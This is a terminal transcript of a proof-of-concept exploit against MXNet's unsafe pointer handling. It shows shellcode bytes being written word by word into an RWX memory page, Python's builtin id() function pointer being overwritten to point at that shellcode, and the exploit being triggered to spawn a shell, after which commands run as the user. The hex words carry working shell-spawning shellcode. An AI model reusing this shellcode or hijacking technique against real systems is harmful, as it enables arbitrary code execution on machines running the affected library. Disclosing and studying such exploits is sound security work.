user@mxnetdev:~/exploit$ python3
******** MXNet Unsafe Pointer Usage Exploit ********
[+] derived RWX_ADDR: 0x7f9ebf94e000
[+] set RWX_ADDR += 0x800 (halfway through page): 0x7f9ebf94e800
[+] Writing shellcode to 0x7f9ebf94e800
[w] w64(0x7f9ebf94e800, 0x120d8d4cec8b48)
[w] w64(0x7f9ebf94e808, 0x58016a318d490000)
[w] w64(0x7f9ebf94e810, 0xe9050f5a146aff33)
[w] w64(0x7f9ebf94e818, 0x6c70784500000015)
[w] w64(0x7f9ebf94e820, 0x636375532074696f)
[w] w64(0x7f9ebf94e828, 0xa216c7566737365)
[w] w64(0x7f9ebf94e830, 0xc031489090909000)
[w] w64(0x7f9ebf94e838, 0x622f2fbb48d23148)
[w] w64(0x7f9ebf94e840, 0xebc14868732f6e69)
[w] w64(0x7f9ebf94e848, 0x485750e789485308)
[w] w64(0x7f9ebf94e850, 0x50f3bb0e689)
[+] Shellcode written!
[+] Deriving address of Python3 builting function id...
[+] Overwriting id() function pointer with address to shellcode...
[w] w64(0x7f9ebf250d40, 0x7f9ebf94e800)
[+] Triggering the exploit!
Exploit Successful!
$ id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
$ whoami
$ exit